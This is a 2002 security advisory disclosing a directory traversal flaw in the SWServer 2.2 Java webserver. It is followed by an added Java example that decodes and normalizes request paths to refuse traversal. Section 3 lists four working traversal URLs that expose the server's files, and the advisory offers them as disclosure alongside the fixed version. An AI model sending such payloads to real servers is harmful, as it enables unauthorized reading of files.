SWServer 2.2 directory traversal bug

From: Bugtest (aluigiat_private)
Date: Wed Aug 28 2002 - 12:46:58 PDT


    ######################################################################
    
    Auriemma Luigi, PivX security advisory 
    
    Application: SWServer 
                 (http://www.geocities.com/tlhome2000/swserver.html)
    Version:     2.2 and previous
    Bug:         Directory traversal bug
    Risk (high): An attacker can view and "surf" in the directories of the
                 remote server and view all the files in it.
    Author:      Auriemma Luigi, Security Researcher, PivX Solutions, LLC
                 e-mail: aluigiat_private
    
    ######################################################################
    
    
    1) Introduction
    2) Bug
    3) The Code
    4) Fix
    5) Philosophy
    
    ______________________________________________________________________
    
    1) Introduction
    
    SWServer is a small free webserver written entirely in Java.
    It can be considered a tiny webserver for tests, or for use by
    single users who don't want to lose time on configuration files.
    
    ______________________________________________________________________
    
    2) Bug
    
    The bug is a directory traversal bug that lets the attacker use the
    remote server like a new read-only drive, fully browsable with a
    browser.
    
    The bad characters that can be used to exploit the vulnerability are
    '\' (%5c) and '/' (%2f).
    
    ______________________________________________________________________
    
    3) The Code
    
    I suggest trying only these links and then following the directories
    with the browser:
    
    http://host/%2f%2e%2e%2f
    http://host/%5c%2e%2e%5c
    http://host/..\
    http://host/../
    
    ______________________________________________________________________
    
    4) Fix
    
    SWServer 2.3, available from its homepage:
    
    http://www.geocities.com/tlhome2000/swserver.html
    
    ______________________________________________________________________
    
    5) Philosophy
    
    I'm really hopeful about the FULL-DISCLOSURE policy, because with it
    "everyone" can know the real effects of an attack, the real danger of
    a bug, someone can learn a bit of creative programming (I have learned
    a bit of interesting C from the source code of some published
    exploits under this policy) and it's useful for all the people that 
    are hopeful in this type of disclosure.
    No secrets!
    
    ______________________________________________________________________
    
    About PivX Solutions
    PivX Solutions is a premier network security consultancy offering a
    myriad of network security services to our clients, the most notable
    being our proprietary Risk and Vulnerability Assessment (RAVA).
    Dedicated PivX founders have also developed the patented Invisiwall
    network security device which offers the most comprehensive and secure
    intrusion detection system available.
    
    For more information go to http://www.PivX.com
    
    
    Any type of feedback is really welcome!
    
    Byez
    
    
    
    -- 
    PivX Security Researcher
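
Added example, not part of the original advisory and not SWServer's code: one way a Java file server can refuse the four requests listed in section 3, by decoding the path once, treating both '\' and '/' as separators, and checking that the normalized result still lies under the document root. The class name, the `resolve` method and the `wwwroot` directory are assumptions; symbolic links are not handled.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.nio.file.Path;

public class SafeResolve {
    /** Returns the file under docRoot that rawPath names, or null if the request must be refused. */
    static Path resolve(Path docRoot, String rawPath) {
        Path root = docRoot.toAbsolutePath().normalize();
        try {
            // Decode exactly once; keep '+' literal (URLDecoder would turn it into a space).
            String decoded = URLDecoder.decode(rawPath.replace("+", "%2B"), StandardCharsets.UTF_8);
            if (decoded.indexOf('\0') >= 0) return null;
            // Treat '\' as a separator on every platform, then make the path relative.
            String relative = decoded.replace('\\', '/').replaceFirst("^/+", "");
            // Collapse "." and ".." first, then compare against the root component by component.
            Path candidate = root.resolve(relative).normalize();
            return candidate.startsWith(root) ? candidate : null;
        } catch (IllegalArgumentException e) {
            // Malformed %-escape, or a path the platform rejects (InvalidPathException).
            return null;
        }
    }

    public static void main(String[] args) {
        Path docRoot = Path.of("wwwroot"); // hypothetical document root
        String[] requests = {
            "/%2f%2e%2e%2f", "/%5c%2e%2e%5c", "/..\\", "/../", // the advisory's four requests
            "/docs/index.html", "/docs/../index.html"          // constructed legitimate requests
        };
        for (String r : requests) {
            Path p = resolve(docRoot, r);
            System.out.println(r + " -> " + (p == null ? "refused" : p));
        }
    }
}
```

The four advisory requests all normalize to the parent of the document root and are refused, while `/docs/../index.html` is served because it still resolves inside the root.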
    


